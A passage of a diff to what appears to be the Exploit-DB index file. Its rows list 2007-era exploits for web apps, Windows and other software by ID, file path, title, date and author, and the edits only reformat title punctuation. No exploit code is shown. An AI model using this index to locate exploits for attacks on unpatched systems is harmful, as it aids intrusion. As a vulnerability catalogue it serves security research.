Exploit",2007-10-22,BugReport.IR,multiple,dos,0 4560,platforms/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service PoC",2007-10-23,ShadowHatesYou,multiple,dos,0 -4561,platforms/php/webapps/4561.txt,"Flatnuke 3 Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 -4562,platforms/php/webapps/4562.txt,"Flatnuke 3 Remote Cookie Manipoulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 +4561,platforms/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 +4562,platforms/php/webapps/4562.txt,"Flatnuke 3 - Remote Cookie Manipoulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 4563,platforms/php/webapps/4563.txt,"php-nuke platinum 7.6.b.5 - Remote File Inclusion Vulnerability",2007-10-23,BiNgZa,php,webapps,0 4564,platforms/multiple/local/4564.txt,"Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit",2007-10-23,sh2kerr,multiple,local,0 4565,platforms/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusion Vulnerabilities",2007-10-23,Civi,php,webapps,0 4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT Remote Overflow Exploit (meta)",2007-10-24,ri0t,windows,remote,10616 -4567,platforms/multiple/remote/4567.pl,"Jakarta Slide <= 2.1 RC1 Remote File Disclosure Exploit",2007-10-24,kingcope,multiple,remote,0 +4567,platforms/multiple/remote/4567.pl,"Jakarta Slide <= 2.1 RC1 - Remote File Disclosure Exploit",2007-10-24,kingcope,multiple,remote,0 4568,platforms/php/webapps/4568.txt,"TikiWiki <= 1.9.8.1 - Local File Inclusion Vulnerabilities",2007-10-25,L4teral,php,webapps,0 4569,platforms/windows/dos/4569.pl,"CA BrightStor HSM <= r11.5 - Remote Stack Based Overflow / DoS",2007-10-27,"Nice Name Crew",windows,dos,0 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit",2007-10-27,bunker,multiple,local,0 @@ -4220,7 +4220,7 @@ id,file,description,date,author,platform,type,port 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities",2007-10-27,GoLd_M,php,webapps,0 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability",2007-10-28,ZynbER,php,webapps,0 -4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability",2007-10-28,mozi,php,webapps,0 +4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - (action) Remote File Inclusion Vulnerability",2007-10-28,mozi,php,webapps,0 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 (emc.asp) Remote SQL Injection Vulnerability",2007-10-28,hak3r-b0y,asp,webapps,0 4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 (GomWeb3.dll 1.0.0.12) Remote Overflow Exploit",2007-10-29,rgod,windows,remote,0 4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 (dl.php file) Remote File Disclosure Vulnerability",2007-10-28,GoLd_M,php,webapps,0 @@ -4241,16 +4241,16 @@ id,file,description,date,author,platform,type,port 4596,platforms/php/webapps/4596.txt,"Scribe <= 0.2 - Remote PHP Code Execution Vulnerability",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4597,platforms/php/webapps/4597.txt,"DM Guestbook <= 0.4.1 - Multiple Local File Inclusion Vulnerabilities",2007-11-02,GoLd_M,php,webapps,0 4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 Insecure Method Exploit",2007-11-02,shinnai,windows,remote,0 -4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 (index.php module) Local File Inclusion Vuln",2007-11-02,GoLd_M,php,webapps,0 +4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - (index.php module) Local File Inclusion Vuln",2007-11-02,GoLd_M,php,webapps,0 4600,platforms/linux/dos/4600.py,"Firefly Media Server <= 0.2.4 - Remote Denial of Service Exploit",2007-11-02,nnp,linux,dos,0 4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit",2007-11-02,RoMaNSoFt,multiple,dos,0 4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion Vulnerability",2007-11-03,irk4z,php,webapps,0 4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vuln",2007-11-03,GoLd_M,php,webapps,0 4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vuln",2007-11-03,GoLd_M,php,webapps,0 -4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 Remote File Inclusion Vulnerabilities",2007-11-04,ShAy6oOoN,php,webapps,0 +4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion Vulnerabilities",2007-11-04,ShAy6oOoN,php,webapps,0 4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 (index.php site) Remote File Inclusion Vulnerability",2007-11-04,GoLd_M,php,webapps,0 4607,platforms/php/webapps/4607.txt,"syndeoCMS 2.5.01 (cmsdir) Remote File Inclusion Vulnerability",2007-11-04,mdx,php,webapps,0 -4608,platforms/php/webapps/4608.php,"JBC Explorer <= 7.20 RC 1 Remote Code Execution Exploit",2007-11-05,DarkFig,php,webapps,0 +4608,platforms/php/webapps/4608.php,"JBC Explorer <= 7.20 RC 1 - Remote Code Execution Exploit",2007-11-05,DarkFig,php,webapps,0 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c Remote SQL Injection Vulnerability",2007-11-05,Q7x,asp,webapps,0 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow PoC",2007-11-06,shinnai,windows,dos,0 4611,platforms/php/webapps/4611.txt,"jPORTAL 2 mailer.php Remote SQL Injection Vulnerability",2007-11-06,Kacper,php,webapps,0 @@ -4260,7 +4260,7 @@ id,file,description,date,author,platform,type,port 4615,platforms/multiple/dos/4615.txt,"MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability",2007-11-09,"Kristian Hermansen",multiple,dos,0 4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0 4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0 -4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script ver 1 Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0 +4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0 4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection Vulnerability",2007-11-11,IRCRASH,php,webapps,0 4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script Remote SQL Injection Vulnerability",2007-11-11,IRCRASH,php,webapps,0 4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 bbcodeSource.php Remote File Inclusion Vulnerability",2007-11-12,p4sswd,php,webapps,0 @@ -4276,11 +4276,11 @@ id,file,description,date,author,platform,type,port 4631,platforms/php/webapps/4631.txt,"phpBBViet <= 02.03.2007 (phpbb_root_path) Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 4632,platforms/php/webapps/4632.txt,"vigilecms 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script Remote SQL Injection Vulnerability",2007-11-18,t0pP8uZz,php,webapps,0 -4634,platforms/php/webapps/4634.php,"IceBB 1.0-rc6 Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0 +4634,platforms/php/webapps/4634.php,"IceBB 1.0-rc6 - Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0 4635,platforms/php/webapps/4635.php,"Sciurus Hosting Panel Remote Code Injection Exploit",2007-11-18,Liz0ziM,php,webapps,0 4636,platforms/php/webapps/4636.txt,"joomla component juser 1.0.14 - Remote File Inclusion Vulnerability",2007-11-19,NoGe,php,webapps,0 4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 (lfi / SQL Injection) Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 -4638,platforms/php/webapps/4638.txt,"skyportal vrc6 Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 +4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4639,platforms/php/webapps/4639.htm,"Ucms <= 1.8 Backdoor Remote Command Execution Exploit",2007-11-21,D4m14n,php,webapps,0 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusion Vulnerabilities",2007-11-21,NoGe,php,webapps,0 4641,platforms/php/webapps/4641.txt,"alstrasoft E-Friends <= 4.98 (seid) Multiple SQL Injection Vulnerabilities",2007-11-21,K-159,php,webapps,0 @@ -4293,7 +4293,7 @@ id,file,description,date,author,platform,type,port 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 RTSP Response Remote SEH Overwrite PoC",2007-11-23,h07,multiple,dos,0 4649,platforms/php/webapps/4649.txt,"Irola My-Time 3.5 - Remote SQL Injection Vulnerability",2007-11-23,"Aria-Security Team",php,webapps,0 4650,platforms/php/webapps/4650.txt,"Mp3 ToolBox 1.0 beta 5 (skin_file) Remote File Inclusion Vulnerability",2007-11-23,Crackers_Child,php,webapps,0 -4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 RSTP Response Code Exec Exploit (Vista/XP)",2007-11-24,InTeL,windows,remote,0 +4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 - RSTP Response Code Execution Exploit (Vista/XP)",2007-11-24,InTeL,windows,remote,0 4652,platforms/php/webapps/4652.txt,"Amber Script 1.0 (show_content.php id) Local File Inclusion Vulnerability",2007-11-24,Crackers_Child,php,webapps,0 4653,platforms/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 events.php Remote SQL Injection Vulnerability",2007-11-24,ka0x,php,webapps,0 4654,platforms/php/webapps/4654.txt,"PBLang <= 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 @@ -4303,8 +4303,8 @@ id,file,description,date,author,platform,type,port 4658,platforms/php/webapps/4658.php,"RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit",2007-11-25,BugReport.IR,php,webapps,0 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion Vulnerability",2007-11-25,ShAy6oOoN,php,webapps,0 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,IRCRASH,php,webapps,0 -4661,platforms/php/webapps/4661.py,"DeluxeBB <= 1.09 Remote Admin Email Change Exploit",2007-11-26,nexen,php,webapps,0 -4662,platforms/php/webapps/4662.txt,"Tilde CMS <= 4.x (aarstal) Remote SQL Injection Vulnerability",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 +4661,platforms/php/webapps/4661.py,"DeluxeBB <= 1.09 - Remote Admin Email Change Exploit",2007-11-26,nexen,php,webapps,0 +4662,platforms/php/webapps/4662.txt,"Tilde CMS <= 4.x - (aarstal) Remote SQL Injection Vulnerability",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 4663,platforms/windows/remote/4663.html,"BitDefender Online Scanner 8 ActiveX Heap Overflow Exploit",2007-11-27,Nphinity,windows,remote,0 4664,platforms/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 RSTP Response Universal Exploit (cool)",2007-11-27,"YAG KOHHA",windows,remote,0 4665,platforms/php/webapps/4665.txt,"Eurologon CMS Multiple Remote SQL Injection Vulnerabilities",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 @@ -4316,11 +4316,11 @@ id,file,description,date,author,platform,type,port 4671,platforms/php/webapps/4671.txt,"EHCP <= 0.22.8 - Multiple Remote File Inclusion Vulnerabilities",2007-11-28,MhZ91,php,webapps,0 4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion Vulnerabilities",2007-11-28,MhZ91,php,webapps,0 4673,platforms/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 - RSTP Response Universal Exploit (win/osx)",2007-11-29,"Subreption LLC.",multiple,remote,0 -4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 Remote File Disclosure Vulnerability",2007-11-28,GoLd_M,php,webapps,0 +4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure Vulnerability",2007-11-28,GoLd_M,php,webapps,0 4675,platforms/php/webapps/4675.txt,"NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities",2007-11-28,GoLd_M,php,webapps,0 4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability",2007-11-29,Evil.Man,php,webapps,0 4677,platforms/php/webapps/4677.txt,"WebED 0.0.9 (index.php) Remote File Disclosure Vulnerability",2007-11-29,GoLd_M,php,webapps,0 -4678,platforms/php/webapps/4678.php,"Seditio CMS <= 121 Remote SQL Injection Exploit",2007-11-29,InATeam,php,webapps,0 +4678,platforms/php/webapps/4678.php,"Seditio CMS <= 121 - Remote SQL Injection Exploit",2007-11-29,InATeam,php,webapps,0 4679,platforms/php/webapps/4679.txt,"KML share 1.1 (region.php layer) Remote File Disclosure Vulnerability",2007-11-29,GoLd_M,php,webapps,0 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability",2007-11-29,GoLd_M,php,webapps,0 4681,platforms/php/webapps/4681.txt,"ftp admin 0.1.0 (lfi/xss/ab) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0 @@ -4328,7 +4328,7 @@ id,file,description,date,author,platform,type,port 4683,platforms/windows/dos/4683.py,"RealPlayer 11 Malformed AU File Denial of Service Exploit",2007-12-01,NtWaK0,windows,dos,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion Vulnerabilities",2007-12-01,ShAy6oOoN,php,webapps,0 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote / Local File Inclusion Vulnerabilities",2007-12-01,Crackers_Child,php,webapps,0 -4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability",2007-12-03,maku234,php,webapps,0 +4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - Remote SQL Injection Vulnerability",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 Active.asp Remote SQL Injection Vulnerability",2007-12-03,BugReport.IR,asp,webapps,0 4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC",2007-12-04,"Ricardo Narvaja",windows,dos,0 4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu <= 1228.0 mach-o Local Kernel Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 @@ -4337,12 +4337,12 @@ id,file,description,date,author,platform,type,port 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 Remote Denial of Service Exploit",2007-12-05,MADYNES,hardware,dos,0 4693,platforms/php/webapps/4693.txt,"SineCMS <= 2.3.4 Calendar Remote SQL Injection Vulnerability",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 4694,platforms/php/webapps/4694.txt,"ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0 -4695,platforms/php/webapps/4695.txt,"Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability",2007-12-05,GoLd_M,php,webapps,0 +4695,platforms/php/webapps/4695.txt,"Wordpress Plugin PictPress <= 0.91 - Remote File Disclosure Vulnerability",2007-12-05,GoLd_M,php,webapps,0 4696,platforms/php/webapps/4696.txt,"SerWeb <= 2.0.0 dev1 2007-02-20 - Multiple RFI / LFI Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce leggi_commenti.asp Remote SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 4699,platforms/windows/remote/4699.txt,"firefly media server (mt-daapd) 2.4.1 / svn 1699 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 -4700,platforms/windows/remote/4700.txt,"simple httpd <= 1.38 Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 +4700,platforms/windows/remote/4700.txt,"simple httpd <= 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0 4702,platforms/windows/local/4702.pl,"Windows Media Player 6.4 MP4 File Stack Overflow PoC",2007-12-08,"SYS 49152",windows,local,0 4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 MP4 tags Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0 @@ -4353,7 +4353,7 @@ id,file,description,date,author,platform,type,port 4708,platforms/php/webapps/4708.txt,"DWdirectory <= 2.1 - Remote SQL Injection Vulnerability",2007-12-09,t0pP8uZz,php,webapps,0 4709,platforms/php/webapps/4709.txt,"SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability",2007-12-09,hadihadi,php,webapps,0 4710,platforms/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE SQL Injection Vuln",2007-12-10,"Aria-Security Team",php,webapps,0 -4711,platforms/php/webapps/4711.txt,"falt4 cms rc4 10.9.2007 Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0 +4711,platforms/php/webapps/4711.txt,"falt4 cms rc4 10.9.2007 - Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0 4712,platforms/php/webapps/4712.txt,"falcon cms 1.4.3 (rfi/xss) Multiple Vulnerabilities",2007-12-10,MhZ91,php,webapps,0 4713,platforms/windows/remote/4713.txt,"barracudadrive <= 3.7.2 - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 Upload Shell / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 @@ -4370,7 +4370,7 @@ id,file,description,date,author,platform,type,port 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 head.php Remote File Inclusion Vulnerability",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability",2007-12-13,MurderSkillz,php,webapps,0 -4728,platforms/php/webapps/4728.txt,"MMS Gallery PHP 1.0 (id) Remote File Disclosure Vulnerability",2007-12-13,GoLd_M,php,webapps,0 +4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 (id) Remote File Disclosure Vulnerability",2007-12-13,GoLd_M,php,webapps,0 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability",2007-12-13,GoLd_M,php,webapps,0 4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix <= 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 4731,platforms/php/webapps/4731.php,"Adult Script <= 1.6 Unauthorized Administrative Access Exploit",2007-12-13,Liz0ziM,php,webapps,0 @@ -4383,7 +4383,7 @@ id,file,description,date,author,platform,type,port 4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 (xss/lfi/etc.) Multiple Vulnerabilities",2007-12-18,MhZ91,php,webapps,0 4739,platforms/php/webapps/4739.pl,"MOG-WebShop (index.php group) Remote SQL Injection Exploit",2007-12-18,k1tk4t,php,webapps,0 4740,platforms/php/webapps/4740.pl,"FreeWebshop 2.2.1 - Remote Blind SQL Injection Exploit",2007-12-18,k1tk4t,php,webapps,0 -4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x Remote File Upload Vulnerability",2007-12-18,Don,php,webapps,0 +4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Remote File Upload Vulnerability",2007-12-18,Don,php,webapps,0 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow PoC",2007-12-18,r4x,windows,dos,0 4743,platforms/php/webapps/4743.pl,"FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device (Goahead WEBSERVER) Disclosure Vulnerability",2007-12-18,NeoCoderz,hardware,remote,0 @@ -4392,14 +4392,14 @@ id,file,description,date,author,platform,type,port 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0 4748,platforms/windows/dos/4748.php,"SurgeMail v.38k4 webmail Host header Denial of Service Exploit",2007-12-18,rgod,windows,dos,0 4749,platforms/windows/local/4749.c,"Rosoft Media Player <= 4.1.7 .M3U Stack Overflow Exploit",2007-12-18,devcode,windows,local,0 -4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x (search.php type) Remote SQL Injection Vulnerability",2007-12-18,Koller,php,webapps,0 +4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x - (search.php type) Remote SQL Injection Vulnerability",2007-12-18,Koller,php,webapps,0 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow Exploit",2007-12-18,"SYS 49152",windows,local,0 4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (win32) (pl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) RFI Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - Bluetooth Stack Local Root Exploit",2007-12-18,Backdoored,linux,local,0 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 -4758,platforms/php/webapps/4758.txt,"xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability",2007-12-19,p4imi0,php,webapps,0 +4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure Vulnerability",2007-12-19,p4imi0,php,webapps,0 4759,platforms/osx/local/4759.c,"Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit",2007-12-19,"Subreption LLC.",osx,local,0 4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25 @@ -4409,7 +4409,7 @@ id,file,description,date,author,platform,type,port 4765,platforms/php/webapps/4765.txt,"1024 cms 1.3.1 (lfi/sql) Multiple Vulnerabilities",2007-12-21,irk4z,php,webapps,0 4766,platforms/php/webapps/4766.txt,"mBlog 1.2 (page) Remote File Disclosure Vulnerability",2007-12-21,irk4z,php,webapps,0 4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusion Vulnerabilities",2007-12-21,MhZ91,php,webapps,0 -4768,platforms/php/webapps/4768.py,"Shadowed Portal <= 5.7d3 Remote Command Execution Exploit",2007-12-21,The:Paradox,php,webapps,0 +4768,platforms/php/webapps/4768.py,"Shadowed Portal <= 5.7d3 - Remote Command Execution Exploit",2007-12-21,The:Paradox,php,webapps,0 4769,platforms/php/webapps/4769.txt,"Shadowed Portal <= 5.7d3 (POST) Remote File Inclusion Vulnerability",2007-12-21,The:Paradox,php,webapps,0 4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 (category.php) Remote SQL Injection Vulnerability",2007-12-22,Koller,php,webapps,0 4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 - Multiple Remote SQL Injection Vulnerabilities",2007-12-22,MhZ91,php,webapps,0 @@ -4423,10 +4423,10 @@ id,file,description,date,author,platform,type,port 4779,platforms/php/webapps/4779.php,"CuteNews <= 1.4.5 Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 (index.php loadadminpage) RFI Vulnerability",2007-12-24,Koller,php,webapps,0 4781,platforms/php/webapps/4781.php,"Jupiter 1.1.5ex Privileges Escalation Exploit",2007-12-24,BugReport.IR,php,webapps,0 -4782,platforms/php/webapps/4782.txt,"Agares PhpAutoVideo 2.21 Remote/Local File Inclusion Vulnerabilities",2007-12-24,MhZ91,php,webapps,0 +4782,platforms/php/webapps/4782.txt,"Agares PhpAutoVideo 2.21 - Remote/Local File Inclusion Vulnerabilities",2007-12-24,MhZ91,php,webapps,0 4783,platforms/php/webapps/4783.txt,"Joomla Component mosDirectory 2.3.2 - Remote File Inclusion Vuln",2007-12-24,ShockShadow,php,webapps,0 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 PassThru Remote Buffer Overflow Exploit",2007-12-24,"Jacopo Cervini",windows,remote,80 -4785,platforms/php/webapps/4785.txt,"TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities",2007-12-25,GoLd_M,php,webapps,0 +4785,platforms/php/webapps/4785.txt,"TeamCalPro 3.1.000 - Multiple Remote/Local File Inclusion Vulnerabilities",2007-12-25,GoLd_M,php,webapps,0 4786,platforms/php/webapps/4786.pl,"AuraCMS 2.2 (admin_users.php) Remote Add Administrator Exploit",2007-12-25,k1tk4t,php,webapps,0 4787,platforms/php/webapps/4787.pl,"RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit",2007-12-25,sh2kerr,php,webapps,0 4788,platforms/php/webapps/4788.txt,"MailMachine Pro 2.2.4 - Remote SQL Injection Vulnerability",2007-12-25,MhZ91,php,webapps,0 @@ -4436,24 +4436,24 @@ id,file,description,date,author,platform,type,port 4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Remote Blind SQL Injection Exploit (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0 4793,platforms/php/webapps/4793.txt,"Blakord Portal <= Beta 1.3.A (all modules) SQL Injection Vulnerability",2007-12-26,JosS,php,webapps,0 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds <= 4.95.11 LFI / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 -4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds <= 4.95.11 Remote File Inclusion Vuln",2007-12-26,Kw3[R]Ln,php,webapps,0 +4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds <= 4.95.11 - Remote File Inclusion Vuln",2007-12-26,Kw3[R]Ln,php,webapps,0 4796,platforms/php/webapps/4796.txt,"PNphpBB2 <= 1.2i - (printview.php phpEx) Local File Inclusion Vuln",2007-12-26,irk4z,php,webapps,0 4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 Logfile Information Disclosure Exploit",2007-12-27,"Alex Hernandez",hardware,remote,0 4798,platforms/php/webapps/4798.php,"ZeusCMS <= 0.3 - Remote Blind SQL Injection Exploit",2007-12-27,EgiX,php,webapps,0 4799,platforms/php/webapps/4799.txt,"Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability",2007-12-27,EcHoLL,php,webapps,0 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 showCode.php Remote Command Execution Vulnerability",2007-12-28,MhZ91,php,webapps,0 4801,platforms/windows/dos/4801.html,"SkyFex Client 1.0 ActiveX Start() Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos,0 -4802,platforms/php/webapps/4802.txt,"XCMS <= 1.82 Remote Local File Inclusion Vulnerability",2007-12-28,nexen,php,webapps,0 +4802,platforms/php/webapps/4802.txt,"XCMS <= 1.82 - Remote Local File Inclusion Vulnerability",2007-12-28,nexen,php,webapps,0 4804,platforms/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com Database Backup Dump Vulnerability",2007-12-28,RoMaNcYxHaCkEr,php,webapps,0 4805,platforms/php/webapps/4805.txt,"NoseRub <= 0.5.2 Login SQL Injection Vulnerability",2007-12-28,"Felix 